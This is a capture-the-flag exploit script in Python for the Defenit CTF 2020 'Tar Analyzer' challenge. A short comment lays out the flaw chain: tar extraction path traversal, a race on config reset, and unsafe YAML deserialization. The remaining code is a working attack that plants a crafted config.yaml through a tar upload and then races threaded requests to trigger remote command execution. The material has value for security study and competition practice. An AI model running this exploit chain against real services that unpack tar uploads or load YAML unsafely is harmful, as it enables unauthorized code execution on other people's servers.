Defenit CTF 2020 - Tar Analyzer

exp.py

#!/usr/bin/python
import requests
import os
import threading
import yaml
import subprocess

'''
Vulnerabilities:
1. Directory Traversal + File upload: User can upload to the parent folder because of tarfile.tar's extractall.
2. Race Condition: When user access "/admin" endpoint, `config.yaml` initializes as default configure.
3. Remote Command Execution: And load that. `config = load(fp.read(), Loader=Loader)`.

Attack:
1. Upload config.yaml that causes RCE, like this(same pickle rce):
```
	class exp(object):
	    def __reduce__(self):
	     return (subprocess.check_output,(['ls','-al'],))

	data = yaml.dump({'allow_host':"blahblah", 'message':exp()}) 
```
2. Get flag by accessing "/admin" endpoint(Race Condition).
'''

url = "http://tar-analyzer.ctf.defenit.kr:8080"
admin_url = url + "/admin"
upload_url = url + "/analyze"

def initialize(ip):
	class exp(object):
		def __reduce__(self):
			return (subprocess.check_output,(['ls','-al'],))

	data = yaml.dump({'allow_host':ip, 'message':exp()}) 

	with open("../../config.yaml","w") as f:
		f.write(data)
	os.system("tar -cvf exp.tar ../../config.yaml")

def do_trigger():
	global trigger_yaml_url
	r = requests.get(admin_url)
	print(r.text)

def do_upload_yaml():
	global upload_url
	files = {
		"file": open("exp.tar","rb")
	}
	r = requests.post(upload_url, files=files)

ip = "[here]"
initialize(ip)
for idx in range(10):
	t = threading.Thread(target=do_upload_yaml,args=())
	v = threading.Thread(target=do_trigger,args=())
	t.start()
	v.start()